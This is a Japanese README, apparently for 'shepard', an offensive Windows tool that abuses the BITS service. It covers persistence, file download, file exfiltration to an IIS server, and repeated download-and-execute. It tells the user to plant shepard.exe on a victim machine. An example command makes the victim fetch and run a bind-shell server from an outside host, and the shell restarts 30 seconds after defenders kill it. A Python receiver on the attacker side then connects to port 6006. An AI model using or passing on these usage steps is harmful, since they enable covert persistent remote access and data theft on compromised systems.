
Windows BITSを使用した持続的なダウンロード/アップロード/実行ツール(開発中)
これは、Windows Background Intelligent Transfer Service (BITS) を利用した永続化ツールです。
ファイルダウンロード、ファイル流出、ファイルダウンロード+永続的実行
shepard.exe を管理者として実行し、以下のコマンドライン引数を指定します:
-d <remoteLocation> <writePath> : 任意のローカルパスへの通常のファイルダウンロード
-e <remoteLocation> <localPath> : 任意のローカルパスからの通常のファイルアップロード(IISサーバーのみに送信します。これはBITSの制限です)
-dr <remoteLocation> <writePath> [optionalFileArgs] : 任意のパスへのファイルダウンロードと、永続化の維持を試みます。ダウンロードしたファイルは optionalFileArgs を使用して実行を試み、BITS は30秒ごとにチェックバックして、ファイルが侵害されたシステム上でまだ実行されていることを確認します。
引数なし、または引数の数が正しくない状態でこの実行可能ファイルを実行すると、shepard は正常に終了します。
サーバー(被害者側)は C# で記述されています。ポート6006で待ち受けます。
shepardsbind_serv.exe を引数なしで実行します。
クライアント(攻撃者側)は Python で記述されており、1つの引数(被害者のマシンのIPアドレス)を受け取ります。
shepardsbind_recv.py <被害者のIP>
shepardsbind_recv.py を引数なしで実行すると、エラーが返ります。
被害者のマシン上に置く必要がある実行可能ファイルは shepard.exe のみです。ダウンロード用の bindshell 実行可能ファイルを公開アクセス可能な場所にホストします。 Shepard が bindshell 実行可能ファイルをダウンロードして実行し、ユーザーは Python レシーバーを使用できるようになります。シェルが検出されて強制終了された場合、30秒後に再起動します。
例: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe